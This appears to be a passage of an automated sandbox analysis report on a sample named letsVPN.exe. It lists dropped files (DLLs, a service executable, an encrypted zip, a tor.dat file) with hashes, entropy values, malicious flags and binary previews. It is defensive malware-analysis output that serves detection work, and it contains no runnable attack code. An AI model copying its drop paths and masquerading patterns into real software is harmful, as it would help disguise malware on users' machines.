                                                                                                                                                                                                  SSDEEP:3072:CXv9qKohEb1guqeLlt3cgATZ+eWeH+BCwVWWBKx1iv:CXsKoGBxJcgGZ+bVWWBm1k
                                                                                                                                                                                                  MD5:BCAE38E6266524A76A57546527DED8CE
                                                                                                                                                                                                  SHA1:79F3040BAEA4C4987CEDB10D30845F70E9D64B0C
                                                                                                                                                                                                  SHA-256:20A400938F7A953DFBA8F89B03555EA3DACFA9D51F71EA15C35258B722BADACA
                                                                                                                                                                                                  SHA-512:35D37CFD07766A76DE222FAC610379D309073065650398EB9A075CF5CAC23EBF3B4599C712ADCB27162CA49F1BF4B0A2249299AC155938E9744F69F44AF1A125
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@..........................@......;.....@..........................................`.................. ............................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\FileSplit.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49152
                                                                                                                                                                                                  Entropy (8bit):6.901141332438222
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:ZgAswxWzmF+kB7CtT2UiGuxfbM/sR/9UFF+kB7CtT2UiGux:OmWQp7rUCJ4/sR9Uvp7rUC
                                                                                                                                                                                                  MD5:AF4898E8762C23845474DFD6C6B7047E
                                                                                                                                                                                                  SHA1:0FC576A3F2467B47686F71704CA44599CBF96CAB
                                                                                                                                                                                                  SHA-256:7910A6E02CE1FE5B519633EFB910F173CAC517D56665A75B50054E0D9656F554
                                                                                                                                                                                                  SHA-512:7693AA3748A56BE4D1AC75B77F2CB8FE01FE71CC278F67ACF5E4D5E5504C9B94FEED0622BA19C09F376941B2551C7C0251409099FEBB97A9AFA167F8FC42779C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......N.....................4.......... ........@.. ....................... ............@.....................................K.......x1.......................................................................... ............... ..H............text....... ...................... ..`.rsrc...x1.......2..................@..@.reloc..............................@..B........................H........v...1......0....H..X.............................................{....*..s....}.....(.....{.....o.....{.....o....*...}......}.....{...........s....o.....{....o....*....0...........{....(......{....(........r...po....o.......................~.....+............r...p......,......(......+@..X.................~.....+............r...p......,......(........(....-....................~.....+............r...p.......,......(.......{....~.....+....(.....s........s .....8.....u..

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\SK.TXT

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):209725
                                                                                                                                                                                                  Entropy (8bit):7.999155296684028
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:3072:bV6ppx9d6U0IqLcls38CNNvbW0ZouvuEVjzR00GSMtIILB/FjzpajiE5liIw8/K+:84Ibls3BNvb9ouxk9BLDzKiMiQ/Ko+y9
                                                                                                                                                                                                  MD5:242BB7507E0B2A8038F847830F926FEC
                                                                                                                                                                                                  SHA1:C391FC67566884065EB8A16961E5405D5B44677B
                                                                                                                                                                                                  SHA-256:7BAB7993F44F9835A44FC93CCE3D513FCBAE2395DAC085DB7F0748B2A21CCA32
                                                                                                                                                                                                  SHA-512:E0E4A997638BF95A558EBB877A2D5E64F2D3A2D2A81D7F15C4453B194E18F3A5BC07589EDB3BC18FDCE1996CFB50B0B00D1FFDF421002E37608EB861F3E7D36C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.....q...*.j..|..q..f)...%...._..T02...i...L...59(]Sq`6..7...W.<=.K]:.qX...U......S..(cr".6...$.`......c.q8.-%>^Q1....8.j.|....FA..N...v..w..J...#&...*.......v...>.~..2O.5.rc.-....6.@...............*.eV>. :..Xh.-....+.xP.q.....]., ~1Q...K.'.....4...jO...........j.Q.>m...(..bc.u07.6.^{......A\..*Z.-.\.%.........w..Cs.6.........)O+KQ`.JT..m..k6...#M..r_H........0.%7.\Sa.Oq........J.p....6..H.g.P..&.:..ngm4.+...Z.y%V.O.e...h.h...........Zn......y...I......q.....a.k%.C['..+.>d.e.(.-.l..w..rM.I).E...5.>B/sQHh...f....E>.<..[.x.^..].....FO.Q.9|..`........O...L..l........;.Yx.,.Ft/xW}.V].A..c.......L....8...nt;:d1....z.-.&[..w..jR@~.)...L.D..............e:.+....,.z.(J....1.J..........).Wn....RA`.&.._..PH.....0'n6.2:e...1.J....i.?.KQ.X........D@# ..}&W.D...U.S....WE...Y.6b...*.<w.....M.y..;...v|..1.s...n..7V.........u.4.u.X>=....>..W.u..AZb......UM.&l8..+..K6U..^.6...I.[.:s..............'<J......j.>|r....8Z.w.H4........r...i.(..al...Y..X.i..y.#

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\a

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.016938637522631
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:HIFYX//kUg+kmWh0rHN9RSJYFAZU0L5Aflov/PfT:HIFQ//kvhkS56ev/PfT
                                                                                                                                                                                                  MD5:C2071F3E0F4D465E4A109BA7549D5619
                                                                                                                                                                                                  SHA1:0ACDE6A36599862CAEADE3E15AD6644D15520547
                                                                                                                                                                                                  SHA-256:9941DE185F7AB38CE773D41DC444FC886F8EB135A1BE5EB255DC0956DA7D1AEF
                                                                                                                                                                                                  SHA-512:D17116206B49A2D255BEB052D06997E149C5537B6DAB6654D6814325A4D20EA19EA7FC37308139FF719E22E81D75646C91523485A37BCABB8B00DD74C5DC2639
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.M.............M.............M........ y...T$..B..J.3................M..7....M..x......M............T$..B..J.3......P....J....M.......M...x.....T$..B..J.3..q..............M...O...M.............T$..B..J.3..@..............M.....P..h.O..j.h.....E......P.....T$..B..J.3................M.....PP..h.O..j.h.....E......P.J....M............M... .....w...T$..B..J.3......0....M....M...(...M...-...T$..B..J.3..w....J.3..m....d.........M..-...M...(...M..(...T$..B..J.3..:....J.3..0..............M..e-...M..(...M..E(...T$..B..J.3.......J.3.................P....)...M..ix....D.....-...T$..B...@...3......J.3...........X....M...v...T$..B..J.3......J.3......D....+....M..0)....|....fF...T$..B...D...3..O....J.3..E....x.........M..S....u........u........u.......T$..B..J.3................M..^,...T$..B..J.3................M...I...M...t......T$..B..J.3......P....a....M..H'...T$..B..J.3......J.3......|....4..........& ...T$..B.......3..`....J.3..V..............M.......T$..B..J.3..3........

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\base.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2482688
                                                                                                                                                                                                  Entropy (8bit):6.599322698372088
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:49152:HymviY7ZdM+3023FbNifZoGlBP3+IoA7YRAt+RB48UOexIFQHkaS5Jv/PfT:HziCdt3023FbNifZ1D3+IoEt+RS8UOel
                                                                                                                                                                                                  MD5:72ADFBFC97B1F1E7ABA3F63CD264C0B2
                                                                                                                                                                                                  SHA1:93DFEBD64B0FC0AA932E23A5D4E6A32CEBE7CF32
                                                                                                                                                                                                  SHA-256:77762C479E46D1DF205EB020D4C1AF5CCD8E433111DC63BE53B2401C7B8257AC
                                                                                                                                                                                                  SHA-512:7AF6E43B7C6086646D1CAC37234658722ABDF466689AB58459468095722E66DB0ED008DA5B2F731D8FB28F60F52EA1FD0C3501C47A79678EB1F6392AF61CB004
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*!..y!..y!..y(.xy-..y(.hy...y!..y..yN.ey...yN.Qy...yN.PyS..yN.Ty#..yN.`y ..yN.ay ..yN.fy ..yRich!..y................PE..L.../.cg...........!................M.........................................&.......&...@.....................................T....0#..0...................p#..U......................................@............................................text...n........................... ..`.rdata..............................@..@.data...<x.... ....... .............@....rsrc....0...0#..2...j".............@..@.reloc..JD...p#..F....".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\msvcp120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):455328
                                                                                                                                                                                                  Entropy (8bit):6.698367093574994
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:uZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77/:W/8wVwHZFTwFOOos3Ooc8DHkC2e77/
                                                                                                                                                                                                  MD5:FD5CABBE52272BD76007B68186EBAF00
                                                                                                                                                                                                  SHA1:EFD1E306C1092C17F6944CC6BF9A1BFAD4D14613
                                                                                                                                                                                                  SHA-256:87C42CA155473E4E71857D03497C8CBC28FA8FF7F2C8D72E8A1F39B71078F608
                                                                                                                                                                                                  SHA-512:1563C8257D85274267089CD4AEAC0884A2A300FF17F84BDB64D567300543AA9CD57101D8408D0077B01A600DDF2E804F7890902C2590AF103D2C53FF03D9E4A5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0.......................................x....@..........................W..L...<...<........................>.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\msvcr120.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):970912
                                                                                                                                                                                                  Entropy (8bit):6.9649735952029515
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:LBmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJQV:dmFyjLF847eiWWcoGZVOIxh/WxIAIbGV
                                                                                                                                                                                                  MD5:034CCADC1C073E4216E9466B720F9849
                                                                                                                                                                                                  SHA1:F19E9D8317161EDC7D3E963CC0FC46BD5E4A55A1
                                                                                                                                                                                                  SHA-256:86E39B5995AF0E042FCDAA85FE2AEFD7C9DDC7AD65E6327BD5E7058BC3AB615F
                                                                                                                                                                                                  SHA-512:5F11EF92D936669EE834A5CEF5C7D0E7703BF05D03DC4F09B9DCFE048D7D5ADFAAB6A9C7F42E8080A5E9AAD44A35F39F3940D5CCA20623D9CAFE373C635570F7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D............................................... .....@.........................`........R..(....p...................>......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\s

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1241344
                                                                                                                                                                                                  Entropy (8bit):6.551959555603401
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:24576:mVaymviYNqEZ3tt++3jyQoH0y23FbNKMipvFaSvAVrolBPZF+vIk7Am47NRkRm7l:HymviY7ZdM+3023FbNifZoGlBP3+IoAn
                                                                                                                                                                                                  MD5:66F67DA104FCAB66D963C47AEAD51677
                                                                                                                                                                                                  SHA1:5C20E591F057607EDABB939234073B7C1E1B0776
                                                                                                                                                                                                  SHA-256:6A3ADB6F15F0790EEAF07BDEBACDC8C3A7766B0CD0F9EAC0001338DA98C3DB18
                                                                                                                                                                                                  SHA-512:321E1E6F8FFE3EFA94BB3A41EF317F0525289DB1397D03FD68115F963AD74234A01459EC2143D9529B09D2C0414771B7E57715109CFF72EEF6049B97F70D3DE3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e.*!..y!..y!..y(.xy-..y(.hy...y!..y..yN.ey...yN.Qy...yN.PyS..yN.Ty#..yN.`y ..yN.ay ..yN.fy ..yRich!..y................PE..L.../.cg...........!................M.........................................&.......&...@.....................................T....0#..0...................p#..U......................................@............................................text...n........................... ..`.rdata..............................@..@.data...<x.... ....... .............@....rsrc....0...0#..2...j".............@..@.reloc..JD...p#..F....".............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):258328
                                                                                                                                                                                                  Entropy (8bit):6.64001582449504
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:/BstfXX0BcNv96T+CZxJK30D62E9NTBqCmN1BIKXXuo:pI0Bc/Y5K3m62E9NTsCmNg2V
                                                                                                                                                                                                  MD5:68411B35F7B40B45AFC4A60A2681549D
                                                                                                                                                                                                  SHA1:98377319160E6DA97FD6E5D97AFE2441E0FE21A6
                                                                                                                                                                                                  SHA-256:5C3A73321F59CDC28164D79E8B60ECC57A90FF398A2CDBDE2BB718C8E9500D23
                                                                                                                                                                                                  SHA-512:CC509C4F41F86C9191BF5FBB826A362FFEF2BC78046B99356F944F39A17ED1AB17A6286FFE6AD03C290F6BBCE492F0DE96954B4C1075B27771C491C2CA027156
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......L....w.X.w.X.w.XN&_X.w.XN&`X.w.XN&]X.w.XN&aX.w.X...X.w.X...X.w.X.%`X.w.X.%]X.w.X.w.X.u.X.%aX.w.X.%[X.w.X.w.X.w.X.%^X.w.XRich.w.X................PE..L....D.V.........."..........$......W|............@.......................................@.................................Lf..................................D,..p................................4..@...............(....e..@....................text............................... ..`.rdata..............................@..@.data...0...........................@....rsrc...............................@..@.reloc..D,..........................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\edb.log

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.830735092153805
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:gJhkM9gB0CnCm0CQ0CESJPB9JbJQfvcso0l1T4MfzzTi1FjIIXYvjbglQdmHDug0:gJjJGtpTq2yv1AuNZRY3diu8iBVqFe
                                                                                                                                                                                                  MD5:EDA19EF36B008909D2CF8EA28BAFF91E
                                                                                                                                                                                                  SHA1:5CE1CA7DA30509DDBA69969FCCCB3ADCCCD82C66
                                                                                                                                                                                                  SHA-256:34A8F3689F2E3091930FE511562B18A0D919BCFBA6A571720942E5F97BBD257A
                                                                                                                                                                                                  SHA-512:68289BD01EE8FB8015DCC80AFE3575E6033CAA57F8081B9D68976DE7AB734262ABA51E3B705712B9266F72024D6FA6A4AAE8F85421F444606FC209900EE6357A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:...M........@..@.-...{5..;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@......................4..........E.[.rXrX.#.........`h.................h.5.......3.....X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:Extensible storage engine DataBase, version 0x620, checksum 0x21621030, page size 16384, DirtyShutdown, Windows version 10.0
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1310720
                                                                                                                                                                                                  Entropy (8bit):0.658617069055208
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:xSB2ESB2SSjlK/rv5rO1T1B0CZSJRYkr3g16P92UPkLk+kAwI/0uzn10M1Dn/di6:xaza9v5hYe92UOHDnAPZ4PZf9h/9h
                                                                                                                                                                                                  MD5:533B7D05CFB99E3F5B32FFBF1813909E
                                                                                                                                                                                                  SHA1:7C378B64753FC2D9EFC5FFD37498E67E6EB682C7
                                                                                                                                                                                                  SHA-256:EFB02C5B1DFE33BC7D5832D731B2326EBF026C0A1EEA6E87DB07008BD3EEDAFF
                                                                                                                                                                                                  SHA-512:5C44A4B3E883F989E918270698F0AA5A31A06859D33279CCB13D4BF39594950317173FDBFFEC879A7795D252FC6A5EA9DBE5E97336313C3DAB2FE8EED2E89C5C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:!b.0... ...............X\...;...{......................0.z..........{.......|..h.|.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........-...{5..............................................................................................................................................................................................2...{...........................................|...................1.C.....|...........................#......h.|.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16384
                                                                                                                                                                                                  Entropy (8bit):0.08126068657057003
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:fW/EYeRnQujP5tGuAJkhvekl1/+mSQujtl/ollrekGltll/SPj:u/EzRn7z5trxlbKTAJe3l
                                                                                                                                                                                                  MD5:782C4A4BE40A52A0702DAC038E22156C
                                                                                                                                                                                                  SHA1:4B858C083D3A40434CBBCA4025F33E474C31A067
                                                                                                                                                                                                  SHA-256:7D542F2467B52858A571A4CC54EA9DCF690C324FAEC44183CF031DA96F654C32
                                                                                                                                                                                                  SHA-512:1984AC16945BE3AD3EFD572F7DA7166227E28598B1DF5AC1E474393D97F68CF080CE160BADBB3C6EB375B23CEC31AB88ED53CEFD8E6EC92484043DCDA1161B4D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:.........................................;...{.......|.......{...............{.......{...XL......{...................1.C.....|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\ckq

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15448957
                                                                                                                                                                                                  Entropy (8bit):7.999985585470918
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:BwoVsxGxbiDDzWzmJ/2inHWazagVdtBrx8wXpZVYcs7:WoWG0DDzWCgin/tB97Yx
                                                                                                                                                                                                  MD5:31F107A675EF31F01B6BD9A235A0312A
                                                                                                                                                                                                  SHA1:885CAB479BF5BB49BC8B756A4D9C4BC4C1617D49
                                                                                                                                                                                                  SHA-256:B9C959D49CCD893BEAA22987475A094D573D00C4A609E534B4D55E0B3D956DBD
                                                                                                                                                                                                  SHA-512:96D28B3D1284146032B1F55BA39AA4D92CD83CA440146CD9E7F564D0D804B72C9390D78894ACAC279324C918607C1F8CFDEEE58F3FF34A20A40447A55F63B01A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:PK...........Y..f\...........letsvpn-latest.exe..xT.7~.#.L2.$... (.h.....r...L.2...#.0.CB.s.[..'Q..Q..^...Bc...^./UZ.'.I.3|\..KP.g..Ac.$...L...}...<.......ge..g....Zk......wwp&....M.}....._.....OY....L.g({g.`U}....u..r.V.......s.....%......333...m....{.$.f..K/9v/{.}....V....;...Uk.T.....9...}5..H..p6C.!..(g...,.7~6.v@cb.6..HM.E'H*{p..<^;[XA*;.;....h...?...2.t....?..x.6...3..f.......W.B./.X.[W)Tr....g.B...j8g..9.....(...r..5... ....P....[K...M........._.r^:.Rj..i.[...b..p.]...y.....D.&Z5..|..E..<^e.,.........x%..8....sz.:.).....S&,kD].4..Km/{...+T.i...b...?{Q.?.....e{yq..E.jjS....XF5.u..."o7.Dv.Y...HFg..s......H|.Y..:"V-'.D41[;...A.m.H.4....6.``...A..Bi.......IO..ZH3.....>......v#..N....;..s..CnN5...._.I'.F.Y.....A;...w-......cc..,3Z....%....5..2.....[u..K.....f.L.b.......{KZ...1{..].P......!.}yli...[.{s.....i........~z.L .......P)..6.......w`.\jq.0$J..U......<.b#<.C.../AMz4.S...I.....B.~cx.;R....n.~...9h..N.Jj.sB..

                                                                                                                                                                                                  C:\ProgramData\letsvpn-latest.exe

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Users\user\Desktop\letsVPN.exe
                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):15511576
                                                                                                                                                                                                  Entropy (8bit):7.998943488854436
                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                  SSDEEP:393216:opzmzGnkfV8tfGWcSWNKQ/kg/bZzvtMA63NiSAO:ohmSkOtfGWcSWJZzlAi+
                                                                                                                                                                                                  MD5:9F5F358AA1A85D222AD967F4538BC753
                                                                                                                                                                                                  SHA1:567404FAEC3641F4DF889C2C92164CEE92723741
                                                                                                                                                                                                  SHA-256:EB11627E59757105BDDB884540854D56B173FE42417878DE4E7D246CAC92C932
                                                                                                                                                                                                  SHA-512:D5A4C4B343704B96C98183D13D90E37065C8BE0D0ED053696FB28B5E29F1432175D5E9F63C2D2879C3EB3541E4822A64AE7BFA2230C0C00B5C3ADA0A1AC82BED
                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L....C.f.................f...".......5............@..........................@......;.....@..........................................`.................. ............................................................................................text...ve.......f.................. ..`.rdata..X............j..............@..@.data...8............~..............@....ndata...................................rsrc........`......................@..@................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\ProgramData\tor.dat

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe
                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):28
                                                                                                                                                                                                  Entropy (8bit):3.767375797816042
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:3:8VEA5YxMn8Y:8VfYxMnJ
                                                                                                                                                                                                  MD5:37F9B67FC7593F3C8D37F7B3FCA1C9B9
                                                                                                                                                                                                  SHA1:2669524622FFF6C8A4158F65881CA63ACB3F3371
                                                                                                                                                                                                  SHA-256:16D81550D58EE7D98675AF4C3AC0EC93D2EFC5684D044D7DF332F3A068843D27
                                                                                                                                                                                                  SHA-512:A0EC96A93DD38D6F193DBCAEB4B4E5254EF3CDFA0E8F8A0C7DB4C2F6CE7C2DAA6B16B2596FD81BB86C1069856F15921EE139441D5A695A482E5604C8D2FB5B4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:tLa0utG1tNG0vca1try0vby1t6Y=

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3046001, writer version 2, read version 2, file counter 7, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                  Entropy (8bit):0.6921140210664358
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:Th49h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/rIr:IqIdjoOofwIdjogAIddJb2id
                                                                                                                                                                                                  MD5:4A639C6E907F0C38EED44EFBA636FCD8
                                                                                                                                                                                                  SHA1:3C72EB257AB1BEDBA25A0417142D7C50B6BE5BB7
                                                                                                                                                                                                  SHA-256:F35C01500A0A76E2D574301CA3371FF7D533A1C8B58591DD82B5ABBB64099FAC
                                                                                                                                                                                                  SHA-512:CEF84F292F0EFDA27EA723B1474B3C5AC1C60D4120C7B6FA7282BF44C459AB7F2C872298A1B2EDD694F409B402DEF9C3EDBEB3E811A4EA173D56DE9D399358B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................zq.....................E..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                  C:\Users\user\AppData\Local\LetsVPN\GoogleAnalytics\LetsGoogleAnalytics.db-journal

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe
                                                                                                                                                                                                  File Type:SQLite Rollback Journal
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4616
                                                                                                                                                                                                  Entropy (8bit):3.7734765485924107
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:7MdqA9h4iAtmGqPRarI7JjwrxOGmwrnfXKKfgsy/rI7JjwrxOGzmxNNoG/Xgsy/E:7stqIdjoOofwIdjogAIddJb2idD
                                                                                                                                                                                                  MD5:ED9AA236AD76EB2C6765B88A83DC688E
                                                                                                                                                                                                  SHA1:895252E3ADE1A2850EE624E522D13BFE7C5ACBB9
                                                                                                                                                                                                  SHA-256:1B13730ACA79871CBF7C4524CAB7EB38199A7AE758BB14DE5AFF6B1B6A94821D
                                                                                                                                                                                                  SHA-512:2F10F29F07416E8D18D2A4464D8E288781566A55092E1D0A9136141DE0AC85F660C3EC6AF1A8DAD91F921A89E8621E23D212D57CB23F98DB047B285A7899618C
                                                                                                                                                                                                  Malicious:false
